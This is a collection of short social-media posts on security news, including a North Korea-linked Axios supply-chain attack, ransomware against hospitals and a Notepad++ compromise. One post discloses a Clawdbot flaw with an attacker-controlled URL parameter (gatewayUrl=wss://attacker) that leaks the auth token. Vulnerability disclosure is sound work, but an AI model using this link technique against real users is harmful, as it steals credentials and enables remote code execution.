🆕 Axios Supply Chain Update
What we know:
— macOS binary overlaps with known North Korean backdoor (Elastic)
— Internal project name macWebT = BlueNoroff's webT module from RustBucket campaigns
— Google TIG has attributed to UNC1069
https://t.co/X7cE8xQhOi
This is a really good read. I like how this guy brings a lot of what he speaks on back to this idea of “creating more value than you consume”.
InfoSec is in a weird spot. You can be all in on AI and also recognize that InfoSec literally means Information Security which probably includes not throwing all your client data into a frontier model.
Local models, shared compute in office DCs, rented inference you have options.
The whole point of the job is protecting information, and a lot of people seem to have forgotten that.
Ransomware threat actors target healthcare because they know hospitals will most likely pay - lives depend on these systems. They don’t care if someone misses chemo, can’t get dialysis, or dies waiting. They are banking on that desperation. Absolute scum.
@RussianPanda9xx Sorry to bother you, but I would love the opportunity to interview you. I’ve been following your work, and I’m truly impressed by what you have accomplished.
🚨We found RCE in Clawdbot 🚨
If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.
The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian".
Here's how it went down 👇
We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load.
Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏
On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token!
Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇
https://t.co/nnoOClDYx8
Rapid7 did a write-up on the Notepad++ compromise. Rapid7 released the paper fast af boi
How?
1. They sat on it
or...
2. Called in all the malware analysis schizos for lock the fuck in time
tldr ya prolly China lol
https://t.co/aebD9noOQ8